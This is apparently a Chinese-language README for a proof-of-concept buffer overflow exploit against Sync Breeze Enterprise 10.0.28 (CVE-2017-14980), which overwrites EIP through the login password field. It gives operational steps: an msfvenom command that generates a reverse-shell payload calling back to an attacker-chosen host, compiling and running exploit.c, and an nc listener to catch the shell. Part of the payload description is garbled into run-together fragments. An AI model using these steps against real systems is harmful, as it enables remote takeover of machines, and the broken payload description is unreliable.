针对 Sync Breeze Enterprise v10.0.28 (CVE-2017-14980) 的概念验证缓冲区溢出利用程序。发送精心构造的 HTTP POST 载荷,覆盖 EIP 并执行自定义 x86 shellcode 以实现任意代码执行。
本仓库包含一个针对 Sync Breeze Enterprise 10.0.28 版本的**缓冲区溢出利用(BOF)**概念验证,针对漏洞 CVE-2017-14980。
该漏洞源于在处理向 /login 端点发送的 POST 请求中的 password 字段时存在不当输入验证。
攻击者可在此字段中发送超长值,从而覆盖 EIP 并允许任意代码执行。
此漏洞利用发送精心构造的有效负载,包含:
'A')password 字段中。gcc)\x83\x0C\x09\x10)和 shellcode使用 msfvenom 生成 shellcode 示例:
msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
gcc exploit.c -o exploit
./exploit
nc -nlvp 4444